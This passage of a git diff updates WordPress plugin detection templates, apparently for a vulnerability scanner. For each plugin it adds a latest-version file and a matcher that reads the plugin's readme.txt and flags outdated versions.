a/technologies/wordpress/wordpress-fluentform.txt b/technologies/wordpress/wordpress-fluentform.txt new file mode 100644 index 0000000000..99ed85a423 --- /dev/null +++ b/technologies/wordpress/wordpress-fluentform.txt @@ -0,0 +1 @@ +4.3.22 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-fluentform.yaml b/technologies/wordpress/wordpress-fluentform.yaml index 93bef0d288..6d06697fec 100644 --- a/technologies/wordpress/wordpress-fluentform.yaml +++ b/technologies/wordpress/wordpress-fluentform.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-fluentform.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-font-awesome.txt b/technologies/wordpress/wordpress-font-awesome.txt new file mode 100644 index 0000000000..ecedc98d1d --- /dev/null +++ b/technologies/wordpress/wordpress-font-awesome.txt @@ -0,0 +1 @@ +4.3.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-font-awesome.yaml b/technologies/wordpress/wordpress-font-awesome.yaml index b7b218b3f8..bc1d6b2e8d 100644 --- a/technologies/wordpress/wordpress-font-awesome.yaml +++ b/technologies/wordpress/wordpress-font-awesome.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-font-awesome.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-force-regenerate-thumbnails.txt b/technologies/wordpress/wordpress-force-regenerate-thumbnails.txt new file mode 100644 index 0000000000..7c32728738 --- /dev/null +++ b/technologies/wordpress/wordpress-force-regenerate-thumbnails.txt @@ -0,0 +1 @@ +2.1.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml b/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml index 828ca52c58..9072dba0a9 100644 --- a/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml +++ b/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-force-regenerate-thumbnails.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-formidable.txt b/technologies/wordpress/wordpress-formidable.txt new file mode 100644 index 0000000000..0413736d69 --- /dev/null +++ b/technologies/wordpress/wordpress-formidable.txt @@ -0,0 +1 @@ +5.5.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-formidable.yaml b/technologies/wordpress/wordpress-formidable.yaml index 83eb75fc06..ce3ecf97e0 100644 --- a/technologies/wordpress/wordpress-formidable.yaml +++ b/technologies/wordpress/wordpress-formidable.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-formidable.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-forminator.txt b/technologies/wordpress/wordpress-forminator.txt new file mode 100644 index 0000000000..e4264e9848 --- /dev/null +++ b/technologies/wordpress/wordpress-forminator.txt @@ -0,0 +1 @@ +1.21.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-forminator.yaml b/technologies/wordpress/wordpress-forminator.yaml index 81ae12c470..973447fc9e 100644 --- a/technologies/wordpress/wordpress-forminator.yaml +++ b/technologies/wordpress/wordpress-forminator.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-forminator.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ga-google-analytics.txt b/technologies/wordpress/wordpress-ga-google-analytics.txt new file mode 100644 index 0000000000..b3dad646d2 --- /dev/null +++ b/technologies/wordpress/wordpress-ga-google-analytics.txt @@ -0,0 +1 @@ +20221016 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ga-google-analytics.yaml b/technologies/wordpress/wordpress-ga-google-analytics.yaml index 1543f6e734..dbd8126d73 100644 --- a/technologies/wordpress/wordpress-ga-google-analytics.yaml +++ b/technologies/wordpress/wordpress-ga-google-analytics.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-ga-google-analytics.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.txt b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.txt new file mode 100644 index 0000000000..202d1aaff4 --- /dev/null +++ b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.txt @@ -0,0 +1 @@ +7.10.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml index d9570c2fb6..682e5e7aba 100644 --- a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml +++ b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-google-analytics-dashboard-for-wp.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-analytics-for-wordpress.txt b/technologies/wordpress/wordpress-google-analytics-for-wordpress.txt new file mode 100644 index 0000000000..2eb8a97206 --- /dev/null +++ b/technologies/wordpress/wordpress-google-analytics-for-wordpress.txt @@ -0,0 +1 @@ +8.10.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml b/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml index a217e9a951..293c4a472f 100644 --- a/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml +++ b/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-google-analytics-for-wordpress.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-listings-and-ads.txt b/technologies/wordpress/wordpress-google-listings-and-ads.txt new file mode 100644 index 0000000000..a6254504e4 --- /dev/null +++ b/technologies/wordpress/wordpress-google-listings-and-ads.txt @@ -0,0 +1 @@ +2.3.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-google-listings-and-ads.yaml b/technologies/wordpress/wordpress-google-listings-and-ads.yaml index 97cc151ad9..99ca945a13 100644 --- a/technologies/wordpress/wordpress-google-listings-and-ads.yaml +++ b/technologies/wordpress/wordpress-google-listings-and-ads.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-google-listings-and-ads.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-site-kit.txt b/technologies/wordpress/wordpress-google-site-kit.txt new file mode 100644 index 0000000000..a0f550d635 --- /dev/null +++ b/technologies/wordpress/wordpress-google-site-kit.txt @@ -0,0 +1 @@ +1.89.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-google-site-kit.yaml b/technologies/wordpress/wordpress-google-site-kit.yaml index 4e8a49691e..dba19beb77 100644 --- a/technologies/wordpress/wordpress-google-site-kit.yaml +++ b/technologies/wordpress/wordpress-google-site-kit.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-google-site-kit.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-sitemap-generator.txt b/technologies/wordpress/wordpress-google-sitemap-generator.txt new file mode 100644 index 0000000000..a4428cffec --- /dev/null +++ b/technologies/wordpress/wordpress-google-sitemap-generator.txt @@ -0,0 +1 @@ +4.1.7 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-google-sitemap-generator.yaml b/technologies/wordpress/wordpress-google-sitemap-generator.yaml index ddb53de961..e9ca057c10 100644 --- a/technologies/wordpress/wordpress-google-sitemap-generator.yaml +++ b/technologies/wordpress/wordpress-google-sitemap-generator.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-google-sitemap-generator.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-gtranslate.txt b/technologies/wordpress/wordpress-gtranslate.txt new file mode 100644 index 0000000000..2a040cbad4 --- /dev/null +++ b/technologies/wordpress/wordpress-gtranslate.txt @@ -0,0 +1 @@ +2.9.14 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-gtranslate.yaml b/technologies/wordpress/wordpress-gtranslate.yaml index f18b4793e5..db237d93fb 100644 --- a/technologies/wordpress/wordpress-gtranslate.yaml +++ b/technologies/wordpress/wordpress-gtranslate.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-gtranslate.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-gutenberg.txt b/technologies/wordpress/wordpress-gutenberg.txt new file mode 100644 index 0000000000..9b87fcc4a4 --- /dev/null +++ b/technologies/wordpress/wordpress-gutenberg.txt @@ -0,0 +1 @@ +14.6.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-gutenberg.yaml b/technologies/wordpress/wordpress-gutenberg.yaml index 103dda9964..2bf36e67df 100644 --- a/technologies/wordpress/wordpress-gutenberg.yaml +++ b/technologies/wordpress/wordpress-gutenberg.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-gutenberg.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-happy-elementor-addons.txt b/technologies/wordpress/wordpress-happy-elementor-addons.txt new file mode 100644 index 0000000000..f577dfda01 --- /dev/null +++ b/technologies/wordpress/wordpress-happy-elementor-addons.txt @@ -0,0 +1 @@ +trunk \ No newline at end of file diff --git a/technologies/wordpress/wordpress-happy-elementor-addons.yaml b/technologies/wordpress/wordpress-happy-elementor-addons.yaml index 945f073ff6..f96f1b00b2 100644 --- a/technologies/wordpress/wordpress-happy-elementor-addons.yaml +++ b/technologies/wordpress/wordpress-happy-elementor-addons.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-happy-elementor-addons.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-header-and-footer-scripts.txt b/technologies/wordpress/wordpress-header-and-footer-scripts.txt new file mode 100644 index 0000000000..fae692e41d --- /dev/null +++ b/technologies/wordpress/wordpress-header-and-footer-scripts.txt @@ -0,0 +1 @@ +2.2.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-header-and-footer-scripts.yaml b/technologies/wordpress/wordpress-header-and-footer-scripts.yaml index fc79a78ea2..511f6f53bd 100644 --- a/technologies/wordpress/wordpress-header-and-footer-scripts.yaml +++ b/technologies/wordpress/wordpress-header-and-footer-scripts.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/header-and-footer-scripts/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-header-and-footer-scripts.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-header-footer-code-manager.txt b/technologies/wordpress/wordpress-header-footer-code-manager.txt new file mode 100644 index 0000000000..321b7ce4c0 --- /dev/null +++ b/technologies/wordpress/wordpress-header-footer-code-manager.txt @@ -0,0 +1 @@ +1.1.30 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-header-footer-code-manager.yaml b/technologies/wordpress/wordpress-header-footer-code-manager.yaml index 33ffe0bd05..cf69aa201d 100644 --- a/technologies/wordpress/wordpress-header-footer-code-manager.yaml +++ b/technologies/wordpress/wordpress-header-footer-code-manager.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-header-footer-code-manager.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-header-footer-elementor.txt b/technologies/wordpress/wordpress-header-footer-elementor.txt new file mode 100644 index 0000000000..3db5326631 --- /dev/null +++ b/technologies/wordpress/wordpress-header-footer-elementor.txt @@ -0,0 +1 @@ +1.6.13 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-header-footer-elementor.yaml b/technologies/wordpress/wordpress-header-footer-elementor.yaml index 4e5b531c32..ce5177577b 100644 --- a/technologies/wordpress/wordpress-header-footer-elementor.yaml +++ b/technologies/wordpress/wordpress-header-footer-elementor.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-header-footer-elementor.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-header-footer.txt b/technologies/wordpress/wordpress-header-footer.txt new file mode 100644 index 0000000000..448ada3bda --- /dev/null +++ b/technologies/wordpress/wordpress-header-footer.txt @@ -0,0 +1 @@ +3.2.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-header-footer.yaml b/technologies/wordpress/wordpress-header-footer.yaml index 591ec75beb..638a713ff3 100644 --- a/technologies/wordpress/wordpress-header-footer.yaml +++ b/technologies/wordpress/wordpress-header-footer.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-header-footer.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-health-check.txt b/technologies/wordpress/wordpress-health-check.txt new file mode 100644 index 0000000000..8e03717dca --- /dev/null +++ b/technologies/wordpress/wordpress-health-check.txt @@ -0,0 +1 @@ +1.5.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-health-check.yaml b/technologies/wordpress/wordpress-health-check.yaml index bc70590ca4..3e966a485d 100644 --- a/technologies/wordpress/wordpress-health-check.yaml +++ b/technologies/wordpress/wordpress-health-check.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-health-check.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-hello-dolly.txt b/technologies/wordpress/wordpress-hello-dolly.txt new file mode 100644 index 0000000000..0a182f2e3a --- /dev/null +++ b/technologies/wordpress/wordpress-hello-dolly.txt @@ -0,0 +1 @@ +1.7.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-hello-dolly.yaml b/technologies/wordpress/wordpress-hello-dolly.yaml index a3d9d89a89..d5cd8e3650 100644 --- a/technologies/wordpress/wordpress-hello-dolly.yaml +++ b/technologies/wordpress/wordpress-hello-dolly.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-hello-dolly.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-imagify.txt b/technologies/wordpress/wordpress-imagify.txt new file mode 100644 index 0000000000..415b19fc36 --- /dev/null +++ b/technologies/wordpress/wordpress-imagify.txt @@ -0,0 +1 @@ +2.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-imagify.yaml b/technologies/wordpress/wordpress-imagify.yaml index 0df1ea0ea1..1c0ce29feb 100644 --- a/technologies/wordpress/wordpress-imagify.yaml +++ b/technologies/wordpress/wordpress-imagify.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-imagify.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-imsanity.txt b/technologies/wordpress/wordpress-imsanity.txt new file mode 100644 index 0000000000..cae9add96b --- /dev/null +++ b/technologies/wordpress/wordpress-imsanity.txt @@ -0,0 +1 @@ +2.8.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-imsanity.yaml b/technologies/wordpress/wordpress-imsanity.yaml index 191da0244b..e991ab5c3e 100644 --- a/technologies/wordpress/wordpress-imsanity.yaml +++ b/technologies/wordpress/wordpress-imsanity.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-imsanity.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-insert-headers-and-footers.txt b/technologies/wordpress/wordpress-insert-headers-and-footers.txt new file mode 100644 index 0000000000..869a1de424 --- /dev/null +++ b/technologies/wordpress/wordpress-insert-headers-and-footers.txt @@ -0,0 +1 @@ +2.0.4.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-insert-headers-and-footers.yaml b/technologies/wordpress/wordpress-insert-headers-and-footers.yaml index 849c203c46..f7d800a21c 100644 --- a/technologies/wordpress/wordpress-insert-headers-and-footers.yaml +++ b/technologies/wordpress/wordpress-insert-headers-and-footers.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-insert-headers-and-footers.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-instagram-feed.txt b/technologies/wordpress/wordpress-instagram-feed.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-instagram-feed.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git 